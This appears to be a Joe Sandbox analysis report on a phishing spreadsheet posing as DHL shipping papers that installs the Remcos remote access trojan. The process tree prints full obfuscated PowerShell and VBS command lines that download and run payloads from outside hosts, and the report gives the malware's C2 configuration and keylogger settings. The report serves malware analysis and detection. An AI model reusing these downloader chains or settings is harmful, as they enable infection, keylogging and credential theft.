Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL Shipment Doc's.xls

Overview

General Information

Sample name:DHL Shipment Doc's.xls
Analysis ID:1525543
MD5:f61e677376c11919999dcd7bd939f6c5
SHA1:10d5926578f1a7bd2cab214c816abea6d22e4eca
SHA256:7cc0739b302669074993c36213f72e4d9be65162e7e445f541e33ea86153083c
Tags:DHLxlsuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3432 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3672 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3812 cmdline: "C:\Windows\system32\cmd.exe" "/c PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3836 cmdline: PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3932 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3944 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB349.tmp" "c:\Users\user\AppData\Local\Temp\00kppfao\CSC26532048CBB457996C7A8C029DD268B.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 4028 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatdayseverythinggoo.vBS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 4068 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ24nKyd0ZW50KTsgWycrJ2RuJysnbGliLklPLkhvbWVdOjpWQUkoezF9JysndHh0LicrJ1YnKydWQkdGJysnUicrJy83JysnOScrJy8wMi4nKycwMicrJzIuMy4yJysnOTEvJysnLycrJzonKydwdHRoezF9LCcrJyB7JysnMX0nKydkZXNhdCcrJ2l2YWRvezEnKyd9LCB7MX0nKydkJysnZXNhdGknKyd2JysnYWRvezF9LCAnKyd7MScrJ31kZXNhJysndGl2YWRveycrJzF9LCcrJyAnKyd7MX1SZWdBc217MX0sJysnIHsxfXsxfSx7MX17MX0pJykgIC1mW0NIYXJdMzksW0NIYXJdMzQsW0NIYXJdMzYpIHwgJiggJEVOVjpDT21zUEVDWzQsMjYsMjVdLUpPSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • powershell.exe (PID: 3228 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/NoDet'+'e'+'ctOn/N'+'oDetec'+'tOn/'+'re'+'f'+'s/hea'+'ds/mai'+'n/Deta'+'hNoth-V'+'.txt{0};'+' {'+'2}base'+'64Content = (New-'+'Object'+' Sys'+'tem.N'+'e'+'t'+'.W'+'e'+'bClient).Do'+'wn'+'loa'+'d'+'String({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binaryContent = ['+'S'+'y'+'stem'+'.Co'+'n'+'v'+'ert]::Fro'+'mBase64St'+'ring({'+'2'+'}base'+'64Co'+'nt'+'ent); {'+'2}asse'+'mbly = [Re'+'flect'+'ion'+'.Ass'+'embl'+'y'+']::'+'Load({2}binar'+'yCo'+'n'+'tent); ['+'dn'+'lib.IO.Home]::VAI({1}'+'txt.'+'V'+'VBGF'+'R'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}RegAsm{1},'+' {1}{1},{1}{1})') -f[CHar]39,[CHar]34,[CHar]36) | &( $ENV:COmsPEC[4,26,25]-JOIN'')" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
                • RegAsm.exe (PID: 896 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 2556 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cmtmpayojnuicgf" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 804 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cmtmpayojnuicgf" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 1628 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cmtmpayojnuicgf" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 2480 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mhhfqkiqxvmvfmtfcdv" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 2096 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wjmxrdtjldezpaqjtnqsed" MD5: 8FE9545E9F72E460723F484C304314AD)
    • mshta.exe (PID: 2104 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 1404 cmdline: "C:\Windows\system32\cmd.exe" "/c PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 2968 cmdline: PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3520 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qjwmez35\qjwmez35.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 1804 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA28.tmp" "c:\Users\user\AppData\Local\Temp\qjwmez35\CSC8672896636494697B648CFD8C23C5D6C.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 3584 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatdayseverythinggoo.vBS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 3684 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ24nKyd0ZW50KTsgWycrJ2RuJysnbGliLklPLkhvbWVdOjpWQUkoezF9JysndHh0LicrJ1YnKydWQkdGJysnUicrJy83JysnOScrJy8wMi4nKycwMicrJzIuMy4yJysnOTEvJysnLycrJzonKydwdHRoezF9LCcrJyB7JysnMX0nKydkZXNhdCcrJ2l2YWRvezEnKyd9LCB7MX0nKydkJysnZXNhdGknKyd2JysnYWRvezF9LCAnKyd7MScrJ31kZXNhJysndGl2YWRveycrJzF9LCcrJyAnKyd7MX1SZWdBc217MX0sJysnIHsxfXsxfSx7MX17MX0pJykgIC1mW0NIYXJdMzksW0NIYXJdMzQsW0NIYXJdMzYpIHwgJiggJEVOVjpDT21zUEVDWzQsMjYsMjVdLUpPSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • powershell.exe (PID: 3956 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/NoDet'+'e'+'ctOn/N'+'oDetec'+'tOn/'+'re'+'f'+'s/hea'+'ds/mai'+'n/Deta'+'hNoth-V'+'.txt{0};'+' {'+'2}base'+'64Content = (New-'+'Object'+' Sys'+'tem.N'+'e'+'t'+'.W'+'e'+'bClient).Do'+'wn'+'loa'+'d'+'String({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binaryContent = ['+'S'+'y'+'stem'+'.Co'+'n'+'v'+'ert]::Fro'+'mBase64St'+'ring({'+'2'+'}base'+'64Co'+'nt'+'ent); {'+'2}asse'+'mbly = [Re'+'flect'+'ion'+'.Ass'+'embl'+'y'+']::'+'Load({2}binar'+'yCo'+'n'+'tent); ['+'dn'+'lib.IO.Home]::VAI({1}'+'txt.'+'V'+'VBGF'+'R'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}RegAsm{1},'+' {1}{1},{1}{1})') -f[CHar]39,[CHar]34,[CHar]36) | &( $ENV:COmsPEC[4,26,25]-JOIN'')" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
                • RegAsm.exe (PID: 3864 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "idabo.duckdns.org:6875:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-I89M3S", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000010.00000002.849805315.000000000244E000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000010.00000002.848958157.0000000000791000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000021.00000002.487528799.0000000000931000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000010.00000002.849173368.00000000007CF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000010.00000002.850008611.0000000003AC2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 27 entries
              SourceRuleDescriptionAuthorStrings
              14.2.powershell.exe.1239d998.1.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
